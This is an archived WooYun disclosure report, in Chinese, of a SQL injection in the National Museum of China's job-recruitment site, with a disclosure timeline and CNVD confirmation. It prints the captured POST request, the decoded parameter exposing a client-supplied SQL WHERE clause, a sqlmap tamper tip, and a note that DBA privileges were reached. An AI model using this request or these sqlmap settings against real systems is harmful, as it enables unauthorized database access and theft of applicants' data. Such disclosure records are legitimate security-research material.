乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-30: 细节已通知厂商并且等待厂商处理中 2015-04-03: 厂商已经确认,细节仅向厂商公开 2015-04-13: 细节向核心白帽子及相关领域专家公开 2015-04-23: 细节向普通白帽子公开 2015-05-03: 细节向实习白帽子公开 2015-05-18: 细节向公众公开
注入
中国国家博物馆招聘站http://guobozhaopin.chnmuseum.cn/dap/dtalent/drs/default/commonPage.jsp?innercode=007注入点位于招聘专业查询处搜索1111burp截包
POST /dap/dframe/ext.AJAX.f?__ajax=true HTTP/1.1Host: guobozhaopin.chnmuseum.cnProxy-Connection: keep-aliveContent-Length: 768Pragma: no-cacheOrigin: http://guobozhaopin.chnmuseum.cnUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Referer: http://guobozhaopin.chnmuseum.cn/dap/dtalent/drs/default/vacancy_list.jsp?channel=3&innercode=001Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: JSESSIONID=CB9F01D4F3C5FCA5C703D5A1F061BA40_rt=loadData&_fid=net.dxtek.dtalent.drs.bs.VacancyList~net.dxtek.dtalent.drs.bs.VacancyListFramelet&_xml=%3Crpc%20id%3D%22dsVacancy%22%20type%3D%22wrapper%22%20objectclazz%3D%22undefined%22%20pi%3D%221%22%20ps%3D%2230%22%20pc%3D%221%22%20prc%3D%220%22%20fs%3D%22pk_vacancy%2Cpk_corp%2Cpk_dept%2Cunitname%2Cdeptname%2Cedureq%2Cedureq_showname%2Cgenderreq%2Cgenderreq_showname%2Crequirecount%2Cworkplace%2Cishot%2Creleasedate%2Cmajorreq%2Cmajornamereq%2Cjob_name%2Cchannel%2Cpk_choose%2Cinnercode%2Cmajorreq_showname%2Cid%22%3E%3Cps%3E%3Cp%20name%3D%22channel%22%3E3%3C/p%3E%3Cp%20name%3D%22__whereSql%22%3Edt_vacancy.job_name%2520like%2520%2527%25251111%2525%2527%3C/p%3E%3C/ps%3E%3Cvps%3E%3Cp%20name%3D%22isUseRauthCode%22%3E1%3C/p%3E%3C/vps%3E%3C/rpc%3E&1427426798657
对post传递的参数url解码后为
_rt=loadData&_fid=net.dxtek.dtalent.drs.bs.VacancyList~net.dxtek.dtalent.drs.bs.VacancyListFramelet&_xml=<rpc id="dsVacancy" type="wrapper" objectclazz="undefined" pi="1" ps="30" pc="1" prc="0" fs="pk_vacancy,pk_corp,pk_dept,unitname,deptname,edureq,edureq_showname,genderreq,genderreq_showname,requirecount,workplace,ishot,releasedate,majorreq,majornamereq,job_name,channel,pk_choose,innercode,majorreq_showname,id"><ps><p name="channel">3</p><p name="__whereSql">dt_vacancy.job_name like '%1111%'</p></ps><vps><p name="isUseRauthCode">1</p></vps></rpc>&1427426798657
可以看出是对参数dt_vacancy.job_name过滤不严,导致注入另外这里采用的是like '%%'所以用sqlmap跑数据的时候要加上--tamper equaltolike.py
DBA权限
如上
过滤
危害等级:中
漏洞Rank:8
确认时间:2015-04-03 13:02
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位通报。
暂无